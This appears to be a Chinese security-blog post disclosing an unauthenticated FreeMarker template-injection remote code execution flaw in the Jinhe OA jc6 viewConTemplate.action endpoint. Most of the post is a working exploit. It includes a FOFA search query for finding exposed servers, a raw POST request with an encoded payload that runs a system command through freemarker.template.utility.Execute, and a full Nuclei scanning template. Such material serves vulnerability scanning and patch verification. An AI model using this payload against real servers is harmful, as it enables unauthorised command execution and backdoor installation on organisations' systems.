金和OA-jc6-viewConTemplate.action接口存在FreeMarker模板注入漏洞,未经身份验证的攻击者可以利用此漏洞远程代码执行、写入后门文件,导致服务器存在被控的风险。
body="/jc6/platform/index/styles"
POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
Host:
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1
id: jinhe-OA-jc6-viewConTemplate-RCE
info:
name: 金和OA jc6 viewConTemplate.action存在FreeMarker模板注入漏洞
author: nobody
severity: critical
description: |
金和OA-jc6-viewConTemplate.action接口存在FreeMarker模板注入漏洞,未经身份验证的攻击者可以利用此漏洞远程代码执行、写入后门文件,导致服务器存在被控的风险。
impact: |
未经身份验证的攻击者可以利用此漏洞远程代码执行
remediation: |
升级版本,打补丁
metadata:
verified: true
max-request: 3
fofa-query: body="/jc6/platform/index/styles"
tags: OA,rce
requests:
- raw:
- |
POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1
matchers:
- type: dsl
dsl:
- status_code == 200 && contains_all(body,"</clob>")
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.